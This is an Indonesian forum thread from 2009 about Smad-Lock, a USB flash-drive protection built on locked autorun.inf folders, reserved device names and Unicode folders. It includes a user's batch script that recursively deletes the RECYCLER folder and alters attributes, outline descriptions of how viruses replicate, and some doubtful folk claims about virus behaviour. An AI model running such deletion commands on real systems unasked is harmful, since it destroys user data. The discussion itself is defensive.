Sip Booss...!!!  :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 20, 2009, 09:22:49 AM
ksimpulannya jdi smadlock itu fungsinya untuk mmbentengi FD qta dri file autorun.inf virus (folder Autorun.inf)..
dan yg kedua utk mlindungi data2 yg ad di FD dari ulah virus dgn syarat harus dimasukan ke folder unicode smadlock (Δ Smad-Lock Δ)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 20, 2009, 09:29:14 AM
Kayaknya struktur autorunnya milik smadav harus diubah deh..........(Saran Aja)....... :-bd :-bd :-bd

sdh dirubah ko sm mas zai, klo sblumnya di dlm folder autorun.inf ad folder smadsoft 2009 n dan yg lainya (ad 2 lgi klo ga slah) tp skr cm 1 yaitu folder con doank..akn sulit tntunya virus utk mmbuat file duplikat dgn nm con.exe,con.scr, krn cranya tdk sm dgn mmbuat folder/file biasa :)
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 20, 2009, 11:06:50 AM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???

AVAST mungkin mampu mendeteksi virus yang (sengaja) dimasukkan ke dalam folder berhuruf Unicode, khususnya <Smad-Lock> ?  :-\ :-X
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 20, 2009, 11:09:50 AM
Wedew... folder autorun.inf tidak dapat diakses oleh penggunanya. :-X
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 20, 2009, 11:37:33 AM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???

AVAST mungkin mampu mendeteksi virus yang (sengaja) dimasukkan ke dalam folder berhuruf Unicode, khususnya <Smad-Lock> ?  :-\ :-X

Kan smad lock fungsix hnya mencegah, apa mgkin sebelumnya udah terkena/mgkin sengaja dimasukin virus yah?  :-\ :-\
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 20, 2009, 10:00:34 PM
Mungkin juga tuh bro... jadi ada virusnya deh... hehehe :D :D
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada September 21, 2009, 06:42:02 AM
Coba discan Anda virusnya ngk :D
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 21, 2009, 11:40:40 AM
Jadi intinya folder Smad Lock itu untuk tempat menyiman file sehingga virus tidak bisa menular...  :D :D
And kalau yang kita copy ke folder Smad Lock-nya sudah bervirus maka ya kena virus deh dalam folder Smad Lock.

Hehehehe bener khan bro...  :D :D :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 21, 2009, 11:44:55 AM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???

AVAST mungkin mampu mendeteksi virus yang (sengaja) dimasukkan ke dalam folder berhuruf Unicode, khususnya <Smad-Lock> ?  :-\ :-X

Kan smad lock fungsix hnya mencegah, apa mgkin sebelumnya udah terkena/mgkin sengaja dimasukin virus yah?  :-\ :-\

Klo virusnya dicoding agr suport unicode(biasany vrus2 intrnsional,jrang yg lokal suport unicode) jd msh te2p bisa infeksi file2 qta yg ad di folder unicde smadlock,.mkny lgsng didetek avast ad vrus di dlm foldernya..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 21, 2009, 11:45:51 AM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???

AVAST mungkin mampu mendeteksi virus yang (sengaja) dimasukkan ke dalam folder berhuruf Unicode, khususnya <Smad-Lock> ?  :-\ :-X

Kan smad lock fungsix hnya mencegah, apa mgkin sebelumnya udah terkena/mgkin sengaja dimasukin virus yah?  :-\ :-\

Klo virusnya dicoding agr suport unicode(biasany vrus2 intrnsional,jrang yg lokal suport unicode) jd msh te2p bisa infeksi file2 qta yg ad di folder unicde smadlock,.mkny lgsng didetek avast ad vrus di dlm foldernya..
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 21, 2009, 11:48:32 AM
Yupz, kemungkinan bs kyak gt jg...
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 21, 2009, 11:49:47 AM
Yu betul juga... cuma udah ada ya virus internaional yang support unicode???  ??? ??? ???
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada September 21, 2009, 12:00:02 PM
Yu betul juga... cuma udah ada ya virus internaional yang support unicode???  ??? ??? ???

Wah bahaya dong... :(
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 21, 2009, 12:07:30 PM
Yu betul juga... cuma udah ada ya virus internaional yang support unicode???  ??? ??? ???

Yupz, virus support unicode...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 21, 2009, 07:08:50 PM
klo virus lokal setw sya blm ad.,atau ad tp sya yg ga tw..hehe

dugaan sya klo vrus intrnasnal mungkin conflicker,alman,sality,krn k-3 vrus ini yg sdh agk canggih tekniknya..
cb aj scan folder unicodeny,didetek ad vrus ap biasanya
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 21, 2009, 11:18:49 PM
Belum pernah kena sih jadi ngga tau... :D :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 22, 2009, 08:08:09 AM
Y setw sya mank blm ad virus yg mmpu msuk ke folder unicode..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 22, 2009, 08:17:02 AM
Mungkin dr tmn2 ad yg mw mngetest mnjlnkan virus sality/alman (penginject exe) di kompt?cb apkah file exe di flder unicde itu ikt trinject jg ga..sya ga mw ah,takut..hehe



share y virus ap biasany yg terdetek di dlm fldernya.
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 23, 2009, 01:17:01 PM
Belum ada dech kayaknya............
Virus yg bisa masuk ke folder smad-locknya.......... :-X :-X :-X :-X
 ;D ;D ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: mi_rd_za pada September 23, 2009, 02:25:01 PM
Mungkin dr tmn2 ad yg mw mngetest mnjlnkan virus sality/alman (penginject exe) di kompt?cb apkah file exe di flder unicde itu ikt trinject jg ga..sya ga mw ah,takut..hehe



share y virus ap biasany yg terdetek di dlm fldernya.

Gw jg gag mw...!!! >=)

Aneh2 aj... =))
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 23, 2009, 03:56:35 PM
Belum ada dech kayaknya............
Virus yg bisa masuk ke folder smad-locknya.......... :-X :-X :-X :-X
 ;D ;D ;D ;D

y belum ada.. :-bd
nnti sya share lg smadlock yg sdh di improve, hrus safehouse pkoknya..yg blm coba silakan donlod  ;)
http://forum.smadav.net/index.php?topic=268.200
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 23, 2009, 05:57:28 PM
Saran saya, folder <>SmadLock<> (bukan Autorun.inf lho!) diperkuat dengan password protection. (Mirip Folder Lock atau sejenisnya.... :D )
Judul: Re: Smad-Lock
Ditulis oleh: MiloMen™ pada September 23, 2009, 06:56:19 PM
Saran saya, folder <>SmadLock<> (bukan Autorun.inf lho!) diperkuat dengan password protection. (Mirip Folder Lock atau sejenisnya.... :D )

Contohnya apa ???
bisa kasih tau ???
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 23, 2009, 09:40:50 PM
Kayaknya struktur autorunnya milik smadav harus diubah deh..........(Saran Aja)....... :-bd :-bd :-bd

sdh dirubah ko sm mas zai, klo sblumnya di dlm folder autorun.inf ad folder smadsoft 2009 n dan yg lainya (ad 2 lgi klo ga slah) tp skr cm 1 yaitu folder con doank..akn sulit tntunya virus utk mmbuat file duplikat dgn nm con.exe,con.scr, krn cranya tdk sm dgn mmbuat folder/file biasa :)


Apaan yg cuma satu????
Trus yg ini apaan?????  ^-^ ^-^ ^-^
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 23, 2009, 09:46:59 PM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???
G juga pernah ketemu hal kaya githu.......... :o :o :o :o
Yg kebaca virus itu, si virus ngebuat FOLDER autorun.inf.exe dan smadsoft 2009.exe di dlm file autorun.inf milik smadav.......
Jadi kalo kita liat, file autorun smadav berubah jadi FOLDER autorun.inf dengan attribute show..................
Bukan virus di dalam folder smad-lock...............
Kalo scan pake ansav juga pasti ke detek virusnya........ :-bd :-bd :-bd :-bd

Ne liat screennya..................
Ada yg bisa jelasin tuch virus NGAPAIN di dlm AUTORUNnya smadav.......????? ;D ;D ;D ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 23, 2009, 10:09:22 PM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???
G juga pernah ketemu hal kaya githu.......... :o :o :o :o
Yg kebaca virus itu, si virus ngebuat FOLDER autorun.inf.exe dan smadsoft 2009.exe di dlm file autorun.inf milik smadav.......
Jadi kalo kita liat, file autorun smadav berubah jadi FOLDER autorun.inf dengan attribute show..................
Bukan virus di dalam folder smad-lock...............
Kalo scan pake ansav juga pasti ke detek virusnya........ :-bd :-bd :-bd :-bd

Ne liat screennya..................
Ada yg bisa jelasin tuch virus NGAPAIN di dlm AUTORUNnya smadav.......????? ;D ;D ;D ;D ;D

autorun.inf sudah terinfeksi virus....
Judul: Re: Smad-Lock
Ditulis oleh: b_agoy pada September 23, 2009, 10:10:30 PM
Ada yg bs jelasin soal ini??  ??? ???
Gw nggk ngerti...  :D :D
Klo emg udah terinfeksi virus, kemungkinan penyebabx apa ja??
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 23, 2009, 10:17:44 PM
Bro semua... Di kaskus ada yg nanya kyk gini:
"gan dsitu dblg kl untuk melindungi file yg ingin diamankan d masukan ke smad lock.. Tp knp ttp k detect virus sama avast y,? Knp y?"

Ada yg tau penyebabx nggk?? Gw nggk ngerti, cz dlu pke avast jg nggk ndetek smad lockx tuh...  ??? ???
G juga pernah ketemu hal kaya githu.......... :o :o :o :o
Yg kebaca virus itu, si virus ngebuat FOLDER autorun.inf.exe dan smadsoft 2009.exe di dlm file autorun.inf milik smadav.......
Jadi kalo kita liat, file autorun smadav berubah jadi FOLDER autorun.inf dengan attribute show..................
Bukan virus di dalam folder smad-lock...............
Kalo scan pake ansav juga pasti ke detek virusnya........ :-bd :-bd :-bd :-bd

Ne liat screennya..................
Ada yg bisa jelasin tuch virus NGAPAIN di dlm AUTORUNnya smadav.......????? ;D ;D ;D ;D ;D

virus sudah masuk dalam file autorun.inf.....istilahnya virus bersembunyi didalam autorunnya.... ;)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada September 23, 2009, 10:32:28 PM
virusnya baca nama folder lalu duplikasi diri didalam folder itu dgn nama folder itu...
tp gak bs masuk folder smadav kan.. biasa deh gak dukung unicode...
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 23, 2009, 10:46:56 PM
virusnya baca nama folder lalu duplikasi diri didalam folder itu dgn nama folder itu...
tp gak bs masuk folder smadav kan.. biasa deh gak dukung unicode...


yups...file autorun smdav tidak bisa dikutak atik virus....tapi membuat duplikat filenya....
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 24, 2009, 02:47:22 PM
Smadlock nya br lg di tster ni.blm smpt upload ke forum,nnti sore/mlm aj..
Jd ad 4 folder nntinya,1 bs di lock (sy jg sbnrny krg ngrti mksud dbri passwrd ap,tp y dcba aj)
msh jauh dr smpurna,jd mklm y.. :D
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 24, 2009, 09:26:12 PM
virusnya baca nama folder lalu duplikasi diri didalam folder itu dgn nama folder itu...
tp gak bs masuk folder smadav kan.. biasa deh gak dukung unicode...


yups...file autorun smdav tidak bisa dikutak atik virus....tapi membuat duplikat filenya....
Tuh virus ngerubah file autorun.inf jadi FOLDER AUTORUN.INF........
Emang sih ga bisa masuk ke folder smad-lock, tapi gmana ma autorunnya yg bisa diinfeksi????
Kok bisa masuk k autorunnya????
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada September 25, 2009, 03:05:00 PM
walo bisa diinfeksi tetep aja tuh virus gak bisa berkembang....secara autorun.inf yang asli udah dikonci...
Judul: Re: Smad-Lock
Ditulis oleh: CAH SMK NS KEMIRI pada September 25, 2009, 03:06:48 PM
wah ada yg hilang datanya nih :( kasih juga bos
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 25, 2009, 03:14:33 PM
virusnya baca nama folder lalu duplikasi diri didalam folder itu dgn nama folder itu...
tp gak bs masuk folder smadav kan.. biasa deh gak dukung unicode...


yups...file autorun smdav tidak bisa dikutak atik virus....tapi membuat duplikat filenya....
Tuh virus ngerubah file autorun.inf jadi FOLDER AUTORUN.INF........
Emang sih ga bisa masuk ke folder smad-lock, tapi gmana ma autorunnya yg bisa diinfeksi????
Kok bisa masuk k autorunnya????

Kemungkinan sewaktu autorun.inf dibuka...
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada September 25, 2009, 03:38:23 PM
Struktur folder Autorun.inf sekarang, kenapa hanya ada folder con?  :-\   ^-^
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 08:58:56 AM
Kayaknya struktur autorunnya milik smadav harus diubah deh..........(Saran Aja)....... :-bd :-bd :-bd

sdh dirubah ko sm mas zai, klo sblumnya di dlm folder autorun.inf ad folder smadsoft 2009 n dan yg lainya (ad 2 lgi klo ga slah) tp skr cm 1 yaitu folder con doank..akn sulit tntunya virus utk mmbuat file duplikat dgn nm con.exe,con.scr, krn cranya tdk sm dgn mmbuat folder/file biasa :)


Apaan yg cuma satu????
Trus yg ini apaan?????  ^-^ ^-^ ^-^



Ada yg aneh dgn ini  :-\  shrusnya struktur smadlock pd rev 6 keatas udh ga ky gni lagi (ga ad folder smadsoft n smadlock TM)..coba unlock dlu smadlock pd drive ini n kmudian lock lgi..shrusnya cma ad folder con doank skr.. :-bd

seperti gmbar di atas    :)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 09:04:51 AM
virusnya baca nama folder lalu duplikasi diri didalam folder itu dgn nama folder itu...
tp gak bs masuk folder smadav kan.. biasa deh gak dukung unicode...


yups...file autorun smdav tidak bisa dikutak atik virus....tapi membuat duplikat filenya....
Tuh virus ngerubah file autorun.inf jadi FOLDER AUTORUN.INF........
Emang sih ga bisa masuk ke folder smad-lock, tapi gmana ma autorunnya yg bisa diinfeksi????
Kok bisa masuk k autorunnya????

Autorun.inf yg dibuat smadlock dari awal memang berupa FOLDER bukan FILE,.hnya sja foldernya di redirect jd seolah-oleh kliatan sperti FILE..jd tdk mungkin ad virus yg ngerubah FILE  autorun.inf jadi FOLDER AUTORUN.INF... :D
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 26, 2009, 09:05:34 AM
ato lu bisa unisntall dulu Smadavnya juga filenya di Program File..
baru install lagi....
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 09:18:13 AM
Gni loh critanya..  :D
Umumnya teknik virus utk mnggandakn diri itu ad 2 cara (algoritma yg beda)..

Algo cra 1 krg lbh sprti ini : dpatkan nm folder -> hidden folder asli -> buat duplikat FILE virus dgn nm yg sm dgn folder asli trsbut  (cnth : FOLDER dgn nm DATA di hidden olh virus dn diduplikat dgn FILE DATA.exe)

Algo cra 2 : dpatkan nm folder -> masuk ke dalam folder trsbut -> buat duplikat file virus di DALAM folder asli trsbut   (cntoh : FOLDER Autorun.inf qta ad tapi ad duplikat FILE virus, pathnya sprti ini Autorun.inf\Autorun.inf.exe)

tp sering juga virus dikoding dgn mnggabungkan cara 1 dan cara 2..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 09:54:11 AM
Struktur folder Autorun.inf sekarang, kenapa hanya ada folder con?  :-\   ^-^

pasti mas zai tau klo dgn struktur yg sblumnya (ad folder smadsoft di dlm folder autorun.inf) kmunkinan besar virus yg mnggndakan diri dgn cara 1 mk bisa mnggndakan diri di dlm FOLDER autorun.inf smadlock n jdny ad file virus smadsoft.exe..

dan jg folder2 yg lain slain folder con tdk ad gunanya juga sbnarnya.. :) (bkn buat proteksi)

dan jg akan sulit bagi virus utk mmbuat file duplikat dgn nama con.exe\aux.exe\nul.exe  :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 10:11:49 AM
Yg perlu diketahui :  ;)
1. smadlock itu mmbuat FOLDER autorun.inf bkn FILE autorun.inf
2. folder autorun.inf ini sdh diproteksi dgn folder con didlamnya agr sulit dihapus oleh virus
3. virus pasti tetap BISA MASUK ke folder ini dan mmbuat FILE duplikatnya (autorun.inf.exe) krn sbnarnya folder ini (autorun.inf) sm dgn folder lainnya, bedanya cm di redirect
4. klo pun ada virus terdeteksi di dlm FOLDER autorun.inf yaitu autorun.inf.exe mka itu hal yg wajar alesannya    ky no 3, beda dgn folder unicode smadlock yg tdk bisa dimasuki virus

 :) :D ;) ;D 8) ??? :-bd :P :-[ :-X :-\ <=) =)) \m/ :x
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 10:21:20 AM
ini baru lagi smad-lock nya, folder unicode yg dpt di LOCK, autorun.inf yg udh diperkuat, dll
akan mmbuat 4 folder, slengkapnya bca file Baca saya.txt dulu,,kpanjangan ngetik disini...
msih byk kkurangan, mklum newbi... :D


Silakan donlod filenya..  ;) ;)
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada September 26, 2009, 10:53:21 AM
Yg perlu diketahui :  ;)
1. smadlock itu mmbuat FOLDER autorun.inf bkn FILE autorun.inf
2. folder autorun.inf ini sdh diproteksi dgn folder con didlamnya agr sulit dihapus oleh virus
3. virus pasti tetap BISA MASUK ke folder ini dan mmbuat FILE duplikatnya (autorun.inf.exe) krn sbnarnya folder ini (autorun.inf) sm dgn folder lainnya, bedanya cm di redirect
4. klo pun ada virus terdeteksi di dlm FOLDER autorun.inf yaitu autorun.inf.exe mka itu hal yg wajar alesannya    ky no 3, beda dgn folder unicode smadlock yg tdk bisa dimasuki virus

 :) :D ;) ;D 8) ??? :-bd :P :-[ :-X :-\ <=) =)) \m/ :x

apa virus bisa menyebar...
Judul: Re: Smad-Lock
Ditulis oleh: galang_cha0s pada September 26, 2009, 11:10:37 AM
@izul

keren, cuman ribet...
gk terlalu ngerti.. tapi keren lah..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 04:12:34 PM
@atas
ribet knpa bro? ???
gra2 bc pnjlasan diatas kali,.hehe

Sbnrnya ideny itu simpel aj.ni utk mlapisi/mmprkuat foldr smadlock doank
1.pnmbhan strktur  pda folder autorun.inf utk mmprkuat proteksiny (pnjlsanny ad di post sy sblumnya)
2.folder unicde <>Smad-lock<> msh mdh utk di rename atw di\ke delete, jd dbwt fldr unicde <>Documents<> yg Anti rename n delete dgn cra biasa
3.prlu flder unicde utk file yg sifatny rhasia, jd dbwt <>Locker<> yg dpt di Lock shga bkn cm aman dr virus tp jg dr tangan org lain.
Jd skr ad 3 folder unicde (Smad-lock,Documents,Locker) yg SANGAT AMAN dr virus maupun org lain(Locker).. :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 26, 2009, 04:27:11 PM
@jastis
pkoknya klo pun di FD qta ad 100 virus yg brsarang dy ga bakal nyebar slma qta ga jalanin file virusnya..knpa? soalny tu virus GA AKTIF, dya cuma numpang tidur doank di FD, nah klo qta bangunin\jalanin baru tu virus nyebar n aktif di kompt qta... :D 
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada September 26, 2009, 04:28:12 PM
Hmm... boleh juga kalau tiga folder... folder Smad Lock untuk installan anti virus... folder autorun.inf untuk matiin proses autorun virus... and folder Locker untuk lock file penting...  ;)

Saran nih untuk si Bos...  :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada September 26, 2009, 11:50:25 PM
Hmm... boleh juga kalau tiga folder... folder Smad Lock untuk installan anti virus... folder autorun.inf untuk matiin proses autorun virus... and folder Locker untuk lock file penting...  ;)

Saran nih untuk si Bos...  :-bd :-bd
Boleh juga sarannya........ ;D ;D ;D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada September 27, 2009, 09:19:47 PM
Udah ad yg nyoba smad-lδck nya blom.. ???
sya cma cb di XP soalnya, ga tw bisa jln dgn baik ga di Vista or 7..  ;)
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada Oktober 02, 2009, 10:39:40 AM
@jastis
pkoknya klo pun di FD qta ad 100 virus yg brsarang dy ga bakal nyebar slma qta ga jalanin file virusnya..knpa? soalny tu virus GA AKTIF, dya cuma numpang tidur doank di FD, nah klo qta bangunin\jalanin baru tu virus nyebar n aktif di kompt qta... :D 

gak salah bro....bukannya ada varian virus yg langsung aktif....
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 02, 2009, 03:42:10 PM
Hmm...? ??? Ada yang aneh  :o , silakan lihat screenshot (terbaru) struktur folder autorun.inf (SmadLock) dibawah ini.... :D :-\
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 02, 2009, 03:46:07 PM
Perhatikan struktur Smad-Lock di Windows Explorer: (sebelah kiri) 8)
 autorun.inf
  con
   aux
    nul

Dan Perhatikan juga struktur Smad-Lock di SmadAV: :D
 autorun.inf
  con

Kesimpulan: Tidak ada subfolder aux dan nul. :-\
Judul: Re: Smad-Lock
Ditulis oleh: kido pada Oktober 02, 2009, 03:50:46 PM
Jika dibuka dengan Windows Explorer maka folder con aux dan nul akan kelihatan
Judul: Re: Smad-Lock
Ditulis oleh: amirdtr pada Oktober 02, 2009, 05:03:47 PM
Dan itu hanya pada sebagian komputer. Yang lain tidak terlihat atau tidak dapat mengakses folder autorun.inf. Mengapa? :-\ :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 02, 2009, 10:32:11 PM
@jastis
pkoknya klo pun di FD qta ad 100 virus yg brsarang dy ga bakal nyebar slma qta ga jalanin file virusnya..knpa? soalny tu virus GA AKTIF, dya cuma numpang tidur doank di FD, nah klo qta bangunin\jalanin baru tu virus nyebar n aktif di kompt qta... :D 

gak salah bro....bukannya ada varian virus yg langsung aktif....

oh emanknya ad y  ??? sya blm tw nih.. contohnya ap y?
cara laen slain pke autorun.inf paling pke skrip desktop.ini+folder.htt utk jlanin virus scra otomatis tp cara
ini jg udh kbaca (bsa kita cegah)..atw mnfaatin pas jndela windows kbuka,ini jg bsa dicgah dri awal..
mksudnya yg lngsung aktif itu gmn y?   :-\
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 02, 2009, 10:51:54 PM
@amir
emang bgtu klo pke wndos explorer bru kliatan folder con\aux\nul nya tp klo dari smadav cma con doank..g tw emank di set bgtu biar folder con,aux,nul ga bs\usah diexplore atau mank ga bisa bc\explore dlmnya klo dri smadav..
Folder con,aux,nul ini jg lolos dari scanning smadav (cb aj taro file didlmnya,ga ke scan pasti).udh sya cba di folder smadlock yg bs di LOCK kmrn
Judul: Re: Smad-Lock
Ditulis oleh: darkzeus pada Oktober 08, 2009, 06:46:35 PM
proteksi smadav sama dengan program sederhana yang saya buat...  :D
ini sedikit scriptnya...

Kode: [Pilih]
echo y
attrib -s -h -r
md\\.\\G:\autorun.inf\con\aux\nul\ ÜßPµ
attrib +s +h +r autorun.inf
attrib -s -h RECYCLER
rd /S RECYCLER
copy c:\windows\0.log RECYCLER
attrib +r +s +h RECYCLER

cuma bedanya, tidak ada proteksi folder recyled,
sekedar masukan, karena banyaknya virus yang menggunakan folder recycled, alangkah baiknya di tambah proteksinya.. seperti baris script batch di atas...

Kode: [Pilih]
copy c:\windows\0.log RECYCLER
attrib +r +s +h RECYCLER

jadi tidak akan ada folder recycler... :D

cuma sekedar masukan dari nubie..
Judul: Re: Smad-Lock
Ditulis oleh: krebot pada Oktober 08, 2009, 07:42:53 PM
@darkzeus bro aq udah coba sc yg ente terangkan di atas, kayaknya klo pc udah kena conflicker tembus jg tuh, and kena virus luar [lupa nama virusnya] tembus jg bro, tp ada sebagian virus yg ngak nembus,
good script bro, but cuma expert yg bisa mengakalinnya, klo macam aq gini, sdh jls kagak bisa ngakali-nya

gw cm user komputer :D

tolong bro berikan idea2 terbaru lg....  :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 08, 2009, 09:31:02 PM
Conficker ga semudah itu bro ngalangin dia bikin folder RECYCLER
Judul: Re: Smad-Lock
Ditulis oleh: darkzeus pada Oktober 09, 2009, 10:07:27 AM
@darkzeus bro aq udah coba sc yg ente terangkan di atas, kayaknya klo pc udah kena conflicker tembus jg tuh, and kena virus luar [lupa nama virusnya] tembus jg bro, tp ada sebagian virus yg ngak nembus,
good script bro, but cuma expert yg bisa mengakalinnya, klo macam aq gini, sdh jls kagak bisa ngakali-nya

gw cm user komputer :D

tolong bro berikan idea2 terbaru lg....  :-bd


 ???

bingung juga sih... klo gw sih pas bnerin server, FD gw g ke infect sama sekali...
virus apa?? boleh minta sample nya??
Judul: Re: Smad-Lock
Ditulis oleh: darkzeus pada Oktober 09, 2009, 10:13:38 AM
Conficker ga semudah itu bro ngalangin dia bikin folder RECYCLER

 :D :D

mbok y dicoba dulu mas...
konsep sederhana iini masih saya pakai sampai saat ini, bahkan sebelum ada smadlock saya sudah memakai trick ini :D

saya tidak membuat folder recycer tetapi membuat file dengan nma recycler...  :D
mungkin anda punya solusi lebih bagi nubie seperti saya :D
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 09, 2009, 10:23:15 AM
Conficker ga semudah itu bro ngalangin dia bikin folder RECYCLER

 :D :D

mbok y dicoba dulu mas...
konsep sederhana iini masih saya pakai sampai saat ini, bahkan sebelum ada smadlock saya sudah memakai trick ini :D

saya tidak membuat folder recycer tetapi membuat file dengan nma recycler...  :D
mungkin anda punya solusi lebih bagi nubie seperti saya :D
1. Install patch windows..........Biar si virus agak sulit menyusup
2. Trus pake AV yg menurut lo AMPUH untuk membantai conficker n cukup ringan dengan RAM lo......(Smadav Juga Bisa mendeteksinya)
3. Selalu update AV yg lu pake...........
 :-bd :-bd :-bd :-bd
Judul: Re: Smad-Lock
Ditulis oleh: darkzeus pada Oktober 09, 2009, 10:31:25 AM
Conficker ga semudah itu bro ngalangin dia bikin folder RECYCLER

 :D :D

mbok y dicoba dulu mas...
konsep sederhana iini masih saya pakai sampai saat ini, bahkan sebelum ada smadlock saya sudah memakai trick ini :D

saya tidak membuat folder recycer tetapi membuat file dengan nma recycler...  :D
mungkin anda punya solusi lebih bagi nubie seperti saya :D
1. Install patch windows..........Biar si virus agak sulit menyusup
2. Trus pake AV yg menurut lo AMPUH untuk membantai conficker n cukup ringan dengan RAM lo......(Smadav Juga Bisa mendeteksinya)
3. Selalu update AV yg lu pake...........
 :-bd :-bd :-bd :-bd

terima kasih atas sarannya..  :-bd

mungkin maksud saya diatas adalah bagaimana melindungi FD kita dari conficker, jika ingin melindungi komputer dari komputer ya memang harus di tambal atau di patch pada celah MS08-067, karena itu memang kelemahan OS itu sendiri...

Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada Oktober 09, 2009, 10:39:29 AM
Conficker ga semudah itu bro ngalangin dia bikin folder RECYCLER

 :D :D

mbok y dicoba dulu mas...
konsep sederhana iini masih saya pakai sampai saat ini, bahkan sebelum ada smadlock saya sudah memakai trick ini :D

saya tidak membuat folder recycer tetapi membuat file dengan nma recycler...  :D
mungkin anda punya solusi lebih bagi nubie seperti saya :D
1. Install patch windows..........Biar si virus agak sulit menyusup
2. Trus pake AV yg menurut lo AMPUH untuk membantai conficker n cukup ringan dengan RAM lo......(Smadav Juga Bisa mendeteksinya)
3. Selalu update AV yg lu pake...........
 :-bd :-bd :-bd :-bd

terima kasih atas sarannya..  :-bd

mungkin maksud saya diatas adalah bagaimana melindungi FD kita dari conficker, jika ingin melindungi komputer dari komputer ya memang harus di tambal atau di patch pada celah MS08-067, karena itu memang kelemahan OS itu sendiri...


Kalo FD sih biarin aja kena tuch conficker, kan si conficker itu ga bisa masuk ke folder Δ Smad-Lock Δ punya smadav.........
Jadi solusinya, lo SIMPAN semua file2 lo k dlm folder Δ Smad-Lock Δ ini.........
Jadi kalo keinfeksi pun, EGP aja........
Ntar kalo lo colokin ke Kompie lo kan di betulin secara otomatis ma smadav n di scan lagi FD lo
trus tinggal lo munculin tuh folder RECYCLER yg kehidden dengan smadav lalu HAPUS................
